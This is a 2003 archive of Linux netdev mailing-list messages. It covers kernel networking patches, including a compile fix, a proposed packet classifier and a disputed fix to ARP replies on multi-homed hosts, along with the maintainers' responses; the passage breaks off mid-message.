13:36:55 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6PKacI18686; Fri, 25 Jul 2003 13:36:39 -0700 Date: Fri, 25 Jul 2003 13:36:38 -0700 From: Stephen Hemminger To: "David S. Miller" Cc: netdev@oss.sgi.com Subject: [PATCH] compile failure with out proc fs Message-Id: <20030725133638.168de3c3.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4306 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev Resolve compile error when CONFIG_IP_MULTICAST && !CONFIG_PROC_FS diff -Nru a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c --- a/net/ipv4/ip_output.c Fri Jul 25 12:31:11 2003 +++ b/net/ipv4/ip_output.c Fri Jul 25 12:31:11 2003 @@ -1313,7 +1313,7 @@ ip_rt_init(); inet_initpeers(); -#ifdef CONFIG_IP_MULTICAST +#if defined(CONFIG_IP_MULTICAST) && defined(CONFIG_PROC_FS) igmp_mc_proc_init(); #endif } From davem@redhat.com Fri Jul 25 13:45:00 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 25 Jul 2003 13:45:03 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6PKixFl023327 for ; Fri, 25 Jul 2003 13:45:00 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id NAA16263; Fri, 25 Jul 2003 13:42:19 -0700 Date: Fri, 25 Jul 2003 13:42:19 -0700 From: "David S. Miller" To: Stephen Hemminger Cc: netdev@oss.sgi.com Subject: Re: [PATCH] compile failure with out proc fs Message-Id: <20030725134219.77bb8823.davem@redhat.com> In-Reply-To: <20030725133638.168de3c3.shemminger@osdl.org> References: <20030725133638.168de3c3.shemminger@osdl.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4307 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Fri, 25 Jul 2003 13:36:38 -0700 Stephen Hemminger wrote: > Resolve compile error when CONFIG_IP_MULTICAST && !CONFIG_PROC_FS Applied, thanks. From tgr@reeler.org Sat Jul 26 16:00:49 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 26 Jul 2003 16:00:56 -0700 (PDT) Received: from rei.rakuen (dclient217-162-65-211.hispeed.ch [217.162.65.211]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6QN0MFl008501 for ; Sat, 26 Jul 2003 16:00:39 -0700 Received: by reeler.org id 19gY0m-0006NP-00 for ; Sun, 27 Jul 2003 00:59:36 +0200 Date: Sun, 27 Jul 2003 00:59:29 +0200 From: Thomas Graf To: netdev@oss.sgi.com Subject: [RFC] Extended Generic Packet Classifier Message-ID: <20030726225929.GF19908@rei.rakuen> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline X-archive-position: 4308 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: tgraf@suug.ch Precedence: bulk X-list: netdev Hello I'd be glad to hear your thoughts about this. The following is a short summary of: http://tgr.kaosu.ch/egp/concept.ps The Extended Generic Packet Classifier (EGP) is something like an extended U32 classifier. An EGP filter consists of 1..n keys which can be chained together using logic AND and OR operators. A Key can also be a container for 1..n subkeys: key1 AND ( key2 OR key3 ) A key can match data with the operators: equal, not-equal, bigger-than, and lesser-than for 8, 16, and 32 bit pieces in a packet. An offset (offset inside the packet to select the bits to be matched) consists of multiple offset elements which can be either constant or dynamic (see below) which are then calculated together with either { + | - | * } A dynamic offset element uses bits of the packet such as IHL. A bitmask and shift operator can be applied to all bits from the packet used for calculation. Examples (Using reference implementation) Matches TCP packets to port 22: egp match u8 eq 6 at 9 and u16 eq 22 at u8 mask 0xf at 0 * 4 + 2 Matches TCP/UDP packets originating from 192.168.23.3: egp match u32 eq 0xc0a81703 at 12 and ( u8 eq 6 at 9 or u8 eq 17 at 9 ) Matches TCP packets to 192.168.23.12 or UDP packets to 192.168.23.3: egp match ( u8 eq 6 at 9 and u32 eq 0xc0a81703 at 16 ) \ or ( u8 eq 17 at 9 and u32 0xc0a8170c at 16 ) Reference implementation: Patch against 2.6.0-test1 and iproute2 can be found at: http://tgr.kaosu.ch/egp/ NOTE: The implementation is done in a straight forward way and not fully tested. I did the project on a self-interest motivation but I'm willing to work further on it if interests are there. Kind Regards -- Thomas GRAF http://tgr.kaosu.ch/ From ahu@outpost.ds9a.nl Sun Jul 27 04:40:51 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 04:41:04 -0700 (PDT) Received: from outpost.ds9a.nl (postfix@outpost.ds9a.nl [213.244.168.210]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6RBeeFl004987 for ; Sun, 27 Jul 2003 04:40:41 -0700 Received: by outpost.ds9a.nl (Postfix, from userid 1000) id 64B99410B; Sun, 27 Jul 2003 13:04:56 +0200 (CEST) Date: Sun, 27 Jul 2003 13:04:56 +0200 From: bert hubert To: jmorris@intercode.com.au, davem@redhat.com, kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com, lartc@mailman.ds9a.nl, linux-kernel@vger.kernel.org Subject: setting up an IPSEC on Linux mailinglist? Message-ID: <20030727110456.GB6556@outpost.ds9a.nl> Reply-To: ahu@ds9a.nl Mail-Followup-To: bert hubert , jmorris@intercode.com.au, davem@redhat.com, kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com, lartc@mailman.ds9a.nl, linux-kernel@vger.kernel.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i X-archive-position: 4309 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ahu@ds9a.nl Precedence: bulk X-list: netdev [crossposted, private replies appreciated to prevent massive list pollution, lartc@mailman.ds9a.nl is closed for non-subscribers] I'm pondering setting up a mailinglist for native Linux 2.6 IPSEC users and I'm wondering is such a list exists already and what your feelings are. This list would be a place for end-users to discuss, where problems found could be thrown over the fence to netdev if needed. Interoperability with FreeS/WAN would also be an appropriate subject. This list could also have a webpage listing all available tools, a FAQ, whatever. Thanks. -- http://www.PowerDNS.com Open source, database driven DNS Software http://lartc.org Linux Advanced Routing & Traffic Control HOWTO From ahu@outpost.ds9a.nl Sun Jul 27 04:40:51 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 04:41:05 -0700 (PDT) Received: from outpost.ds9a.nl (postfix@outpost.ds9a.nl [213.244.168.210]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6RBedFl004986 for ; Sun, 27 Jul 2003 04:40:40 -0700 Received: by outpost.ds9a.nl (Postfix, from userid 1000) id EEE7644F8; Sun, 27 Jul 2003 13:07:19 +0200 (CEST) Date: Sun, 27 Jul 2003 13:07:19 +0200 From: bert hubert To: "Dr. Peter Bieringer " Cc: Maillist netdev , Maillist USAGI-users Subject: Re: Compatibility problems IPsec 2.5.70 against FreeS/WAN 1.99 Message-ID: <20030727110719.GC6556@outpost.ds9a.nl> Mail-Followup-To: bert hubert , "Dr. Peter Bieringer " , Maillist netdev , Maillist USAGI-users References: <20030604145350.88F0D1387A@smtp2.aerasec.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030604145350.88F0D1387A@smtp2.aerasec.de> User-Agent: Mutt/1.3.28i X-archive-position: 4310 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ahu@ds9a.nl Precedence: bulk X-list: netdev On Wed, Jun 04, 2003 at 04:53:50PM +0200, Dr. Peter Bieringer wrote: > Hi, > > has anyone successful examples of configuration settings for 2.5.70 IPsec > (racoon/SAD/SPD) and FreeS/WAN? I've heard reports that it worked at one stage so if it doesn't now, something must've broken recently. > I got no success between 2 hosts, neither in tunnel nor in transport mode. I'll try to roust some FreeS/WAN fanatics I know to help test. Bert -- http://www.PowerDNS.com Open source, database driven DNS Software http://lartc.org Linux Advanced Routing & Traffic Control HOWTO From davem@redhat.com Sun Jul 27 13:28:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 13:28:34 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6RKSUFl021669 for ; Sun, 27 Jul 2003 13:28:30 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id NAA25827; Sun, 27 Jul 2003 13:24:46 -0700 Date: Sun, 27 Jul 2003 13:24:45 -0700 From: "David S. Miller" To: ahu@ds9a.nl Cc: jmorris@intercode.com.au, kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com, lartc@mailman.ds9a.nl, linux-kernel@vger.kernel.org Subject: Re: setting up an IPSEC on Linux mailinglist? Message-Id: <20030727132445.5e0eddab.davem@redhat.com> In-Reply-To: <20030727110456.GB6556@outpost.ds9a.nl> References: <20030727110456.GB6556@outpost.ds9a.nl> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4311 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Sun, 27 Jul 2003 13:04:56 +0200 bert hubert wrote: > I'm pondering setting up a mailinglist for native Linux 2.6 IPSEC users and > I'm wondering is such a list exists already and what your feelings are. No need, just use linux-net. From bloemsaa@xs4all.nl Sun Jul 27 13:41:22 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 13:41:27 -0700 (PDT) Received: from smtpzilla1.xs4all.nl (smtpzilla1.xs4all.nl [194.109.127.137]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6RKfKFl022552 for ; Sun, 27 Jul 2003 13:41:22 -0700 Received: from vialle.bloemsaat.com (vialle.xs4all.nl [213.84.6.25]) by smtpzilla1.xs4all.nl (8.12.9/8.12.9) with ESMTP id h6RKel8e098361; Sun, 27 Jul 2003 22:40:51 +0200 (CEST) Date: Sun, 27 Jul 2003 22:52:48 +0200 (CEST) From: Bas Bloemsaat X-X-Sender: bloemsaa@vialle.bloemsaat.com To: marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org cc: layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: [2.4 PATCH] bugfix: ARP respond on all devices Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4312 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: bloemsaa@xs4all.nl Precedence: bulk X-list: netdev Yesterday (20030726) I found out, that with two NICs on one ethernet segment, ARPing for one IP address gave me two answers, one from each NIC with the MAC address from each of them. They each have a seperate IP address. First I thought the NICs where doing proxy arp on each other, but it turned out that this wasn't the case. On closer examination it turned out that any ARP request to a local IP resulted in a response, even if the devices were on different subnets or ethernet segments. I learned from the kernel sources that any NIC receiving an ARP request for any local IP adress would respond to that request. Among others, that has the following implications: - when you have two NICs same ethernet segment, only one of them is used: they both respond to any ARP request. As only the first response is ever used (fasted router), only the NIC that responds first receives any traffic. This NIC may or may not be bound to the destination IP. It may not even be reachable because of iptables-rules. This also defeats a common form of load balancing. - when you have two NICs on seperate ethernet segments, for example on a firewall, it is possible to probe one NIC for the IP address of the other. This can be used to gain information about the inside network of the firewall, which is a (minor) security risk. While this is not really practical because every IP address has to be tried, often the inside is of a limit range (10.x.x.x, 192.168.x.x), which makes it useful. I think this is unwanted behaviour. This patch corrects the situation. It makes every device only respond to ARP requests for IP addresses bound to that device, not all local IP addresses. Proxy ARP still applies as before. The patch was made from 2.4.21. It patches 2.4.22-pre8 cleanly and tests okay on both. Please apply. diff -urN linux-2.4.21.orig/include/linux/inetdevice.h linux-2.4.21-okayclean/include/linux/inetdevice.h --- linux-2.4.21.orig/include/linux/inetdevice.h 2002-08-03 02:39:45.000000000 +0200 +++ linux-2.4.21-okayclean/include/linux/inetdevice.h 2003-07-27 18:51:28.000000000 +0200 @@ -86,6 +86,7 @@ extern u32 inet_select_addr(const struct net_device *dev, u32 dst, int scope); extern struct in_ifaddr *inet_ifa_byprefix(struct in_device *in_dev, u32 prefix, u32 mask); extern void inet_forward_change(void); +extern int inet_addr_local_dev(struct in_device *in_dev, u32 addr); static __inline__ int inet_ifa_match(u32 addr, struct in_ifaddr *ifa) { diff -urN linux-2.4.21.orig/net/ipv4/arp.c linux-2.4.21-okayclean/net/ipv4/arp.c --- linux-2.4.21.orig/net/ipv4/arp.c 2002-11-29 00:53:15.000000000 +0100 +++ linux-2.4.21-okayclean/net/ipv4/arp.c 2003-07-27 21:12:17.000000000 +0200 @@ -66,6 +66,7 @@ * Alexey Kuznetsov: new arp state machine; * now it is in net/core/neighbour.c. * Krzysztof Halasa: Added Frame Relay ARP support. + * Bas Bloemsaat : (20030727) Fixed respond on all devices bug */ #include @@ -766,7 +767,9 @@ rt = (struct rtable*)skb->dst; addr_type = rt->rt_type; - if (addr_type == RTN_LOCAL) { + + /* check if arp is for this device */ + if (inet_addr_local_dev(in_dev,tip)) { n = neigh_event_ns(&arp_tbl, sha, &sip, dev); if (n) { int dont_send = 0; @@ -778,6 +781,8 @@ neigh_release(n); } goto out; + + /* check if we can and have to proxy it */ } else if (IN_DEV_FORWARD(in_dev)) { if ((rt->rt_flags&RTCF_DNAT) || (addr_type == RTN_UNICAST && rt->u.dst.dev != dev && diff -urN linux-2.4.21.orig/net/ipv4/devinet.c linux-2.4.21-okayclean/net/ipv4/devinet.c --- linux-2.4.21.orig/net/ipv4/devinet.c 2003-06-13 16:51:39.000000000 +0200 +++ linux-2.4.21-okayclean/net/ipv4/devinet.c 2003-07-27 18:50:19.000000000 +0200 @@ -199,6 +199,17 @@ return 0; } +int +inet_addr_local_dev(struct in_device *in_dev, u32 addr) +{ + for_ifa(in_dev) { + if (!(addr^ifa->ifa_address)) + return -1; + } endfor_ifa(in_dev); + + return 0; +} + static void inet_del_ifa(struct in_device *in_dev, struct in_ifaddr **ifap, int destroy) { From bloemsaa@xs4all.nl Sun Jul 27 14:00:43 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 14:00:52 -0700 (PDT) Received: from smtpzilla2.xs4all.nl (smtpzilla2.xs4all.nl [194.109.127.138]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6RL0gFl023717 for ; Sun, 27 Jul 2003 14:00:43 -0700 Received: from vialle.bloemsaat.com (vialle.xs4all.nl [213.84.6.25]) by smtpzilla2.xs4all.nl (8.12.9/8.12.9) with ESMTP id h6RL0T0A069189; Sun, 27 Jul 2003 23:00:29 +0200 (CEST) Date: Sun, 27 Jul 2003 23:12:30 +0200 (CEST) From: Bas Bloemsaat X-X-Sender: bloemsaa@vialle.bloemsaat.com To: netdev@oss.sgi.com, linux-net@vger.kernel.org, torvalds@osdl.org cc: linux-kernel@vger.kernel.org, layes@loran.com Subject: [2.6 PATCH] bugfix: ARP respond on all devices Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4313 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: bloemsaa@xs4all.nl Precedence: bulk X-list: netdev This is the samefix as the 2.4 patch. I do not have a machine on which I can test 2.6, but visual examination of the files suggested the same mechanism. In fact, I was surprised that the 2.4 patch wouldn't patch 2.6 so I made this one. It was made with 2.6.0-test1, and compiles. Can someone confirm that 2.6 has the same bug, and that this patch fixes it? I suspect it has, and suspect this fixes it, but can't test for lack of an available machine. Regards, Bas Bloemsaat diff -urN linux-2.6.0-test1.orig/include/linux/inetdevice.h linux-2.6.0-test1/include/linux/inetdevice.h --- linux-2.6.0-test1.orig/include/linux/inetdevice.h 2003-07-14 05:35:56.000000000 +0200 +++ linux-2.6.0-test1/include/linux/inetdevice.h 2003-07-27 21:33:02.000000000 +0200 @@ -98,6 +98,7 @@ extern u32 inet_select_addr(const struct net_device *dev, u32 dst, int scope); extern struct in_ifaddr *inet_ifa_byprefix(struct in_device *in_dev, u32 prefix, u32 mask); extern void inet_forward_change(void); +extern int inet_addr_local_dev(struct in_device *in_dev, u32 addr); static __inline__ int inet_ifa_match(u32 addr, struct in_ifaddr *ifa) { diff -urN linux-2.6.0-test1.orig/net/ipv4/arp.c linux-2.6.0-test1/net/ipv4/arp.c --- linux-2.6.0-test1.orig/net/ipv4/arp.c 2003-07-14 05:37:28.000000000 +0200 +++ linux-2.6.0-test1/net/ipv4/arp.c 2003-07-27 21:37:31.000000000 +0200 @@ -67,6 +67,7 @@ * now it is in net/core/neighbour.c. * Krzysztof Halasa: Added Frame Relay ARP support. * Arnaldo C. Melo : convert /proc/net/arp to seq_file + * Bas Bloemsaat : (20030727) Fixed respond on all devices bug */ #include @@ -750,7 +751,8 @@ rt = (struct rtable*)skb->dst; addr_type = rt->rt_type; - if (addr_type == RTN_LOCAL) { + /* check if arp is for this device */ + if (inet_addr_local_dev(in_dev,tip)) { n = neigh_event_ns(&arp_tbl, sha, &sip, dev); if (n) { int dont_send = 0; @@ -762,6 +764,7 @@ neigh_release(n); } goto out; + /* check if we can and have to proxy it */ } else if (IN_DEV_FORWARD(in_dev)) { if ((rt->rt_flags&RTCF_DNAT) || (addr_type == RTN_UNICAST && rt->u.dst.dev != dev && diff -urN linux-2.6.0-test1.orig/net/ipv4/devinet.c linux-2.6.0-test1/net/ipv4/devinet.c --- linux-2.6.0-test1.orig/net/ipv4/devinet.c 2003-07-14 05:31:57.000000000 +0200 +++ linux-2.6.0-test1/net/ipv4/devinet.c 2003-07-27 21:34:46.000000000 +0200 @@ -219,6 +219,15 @@ return 0; } +int inet_addr_local_dev(struct in_device *in_dev, u32 addr) +{ + for_ifa(in_dev) { + if (!(addr^ifa->ifa_address)) + return -1; + } endfor_ifa(in_dev); + return 0; +} + static void inet_del_ifa(struct in_device *in_dev, struct in_ifaddr **ifap, int destroy) { From davem@redhat.com Sun Jul 27 15:15:43 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 15:15:49 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6RMFhFl028392 for ; Sun, 27 Jul 2003 15:15:43 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id PAA25990; Sun, 27 Jul 2003 15:12:34 -0700 Date: Sun, 27 Jul 2003 15:12:34 -0700 From: "David S. Miller" To: Bas Bloemsaat Cc: marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Message-Id: <20030727151234.6e2aa57e.davem@redhat.com> In-Reply-To: References: X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4314 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Sun, 27 Jul 2003 22:52:48 +0200 (CEST) Bas Bloemsaat wrote: > I think this is unwanted behaviour. Not a bug. This behavior is on purpose. Use source based routes if you want to control how ARP responses behave in this way. This is becomming a FAQ. From davem@redhat.com Sun Jul 27 16:37:27 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 16:37:34 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6RNbQFl000718 for ; Sun, 27 Jul 2003 16:37:27 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id QAA26251; Sun, 27 Jul 2003 16:34:22 -0700 Date: Sun, 27 Jul 2003 16:34:22 -0700 From: "David S. Miller" To: Cedric Gavage Cc: alan@lxorguk.ukuu.org.uk, netdev@oss.sgi.com Subject: Re: [Fwd: kernel 2.4.21] Message-Id: <20030727163422.28e44736.davem@redhat.com> In-Reply-To: <3F1E7435.4060308@unixtech.be> References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> <20030719191723.0821227f.davem@redhat.com> <3F1E53F7.5000803@unixtech.be> <20030723023528.76b0f69c.davem@redhat.com> <3F1E58EE.5010109@unixtech.be> <20030723024648.2e4b6a62.davem@redhat.com> <3F1E7435.4060308@unixtech.be> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4315 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 23 Jul 2003 13:40:37 +0200 Cedric Gavage wrote: > Ok, now it's e100 driver, I will wait some hours to see if we have again > problems, thanks for your help. Any problems yet? From carlosev@newipnet.com Sun Jul 27 16:41:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 16:41:22 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6RNf9Fl001231 for ; Sun, 27 Jul 2003 16:41:13 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id DFE6420948; Mon, 28 Jul 2003 01:41:03 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 46E7B20642; Mon, 28 Jul 2003 01:40:45 +0200 (CEST) Message-ID: <200307280140470646.1078EC67@192.168.128.16> In-Reply-To: References: X-Mailer: Calypso Version 3.30.00.00 (4) Date: Mon, 28 Jul 2003 01:40:47 +0200 From: "Carlos Velasco" To: "Bas Bloemsaat" , marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org Cc: layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6RNf9Fl001231 X-archive-position: 4316 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 27/07/2003 at 22:52 Bas Bloemsaat wrote: >I learned from the kernel sources that any NIC receiving an ARP request >for any local IP adress would respond to that request. Among others, that >has the following implications: >- when you have two NICs same ethernet segment, only one of them is used: >they both respond to any ARP request. As only the first response is ever >used (fasted router), only the NIC that responds first receives any >traffic. This NIC may or may not be bound to the destination IP. It may >not even be reachable because of iptables-rules. This also defeats a >common form of load balancing. I stepped into the same problems you have reported here. There's a feature to do linux to behave like other OS and systems, called "hidden". However it's not included into the default kernel main stream. Although IMHO IT SHOULD BE. Here is the patch: http://www.ssi.bg/~ja/#hidden Extracted from http://www.linuxvirtualserver.org/docs/arp.html: === Linux kernel 2.0.xx doesn't do arp response on loopback alias and tunneling interfaces, it is good for the LVS cluster. However, Linux kernel 2.2.xx does all arp responses of all its IP addresses except the loopback addresses (127.0.0.0/255.0.0.0) and multicast addresses. === Currently linux is the only OS those I have tried with this behaviour: Solaris 8 -> does not send ARP reply of other interface. Cisco -> does not send ARP reply of other interface. Windows 2000, XP -> does not send ARP reply of other interface. Linux 2.6.0-pre1, 2.4.20, 2.4.21 -> DOES send ARP reply of other interface >- when you have two NICs on seperate ethernet segments, for example on a >firewall, it is possible to probe one NIC for the IP address of the other. >This can be used to gain information about the inside network of the >firewall, which is a (minor) security risk. While this is not really >practical because every IP address has to be tried, often the inside is of >a limit range (10.x.x.x, 192.168.x.x), which makes it useful. Yes, minor security problem arise with this _INTENTIONAL_ behaviour of linux networking. The official approach is that you play with routing and netfilter/arpfilter to solve this _INTENTIONAL_ behaviour and make linux behave like other OS do. The unofficial (not in the kernel main stream, reason unknow) is to use the "hidden patch". This works using a /proc switch: /proc/sys/net/ipv4/conf//hidden, so it should not break anything. However is not into the main kernel. Regards, Carlos Velasco From davem@redhat.com Sun Jul 27 16:50:02 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 16:50:06 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6RNo1Fl002019 for ; Sun, 27 Jul 2003 16:50:02 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id QAA26314; Sun, 27 Jul 2003 16:46:50 -0700 Date: Sun, 27 Jul 2003 16:46:49 -0700 From: "David S. Miller" To: "Carlos Velasco" Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Message-Id: <20030727164649.517b2b88.davem@redhat.com> In-Reply-To: <200307280140470646.1078EC67@192.168.128.16> References: <200307280140470646.1078EC67@192.168.128.16> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4317 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 28 Jul 2003 01:40:47 +0200 "Carlos Velasco" wrote: > I stepped into the same problems you have reported here. No, your problem was completely different. > There's a feature to do linux to behave like other OS and systems, called "hidden". WRONG! People please stop this misinformation already. Bas's problem can be solved by him giving a "preferred source" to each of his IPV4 routes and setting the "arpfilter" sysctl variable for his devices to "1". This particular case has been discussed to death in the past and I really recommend people read up there before dragging this out further. From carlosev@newipnet.com Sun Jul 27 16:58:39 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 16:58:46 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6RNwaFl002808 for ; Sun, 27 Jul 2003 16:58:37 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 115E020642; Mon, 28 Jul 2003 01:58:33 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 4EBE22092D; Mon, 28 Jul 2003 01:58:23 +0200 (CEST) Message-ID: <200307280158250677.10891156@192.168.128.16> In-Reply-To: <20030727164649.517b2b88.davem@redhat.com> References: <200307280140470646.1078EC67@192.168.128.16> <20030727164649.517b2b88.davem@redhat.com> X-Mailer: Calypso Version 3.30.00.00 (4) Date: Mon, 28 Jul 2003 01:58:25 +0200 From: "Carlos Velasco" To: "David S. Miller" Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6RNwaFl002808 X-archive-position: 4318 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 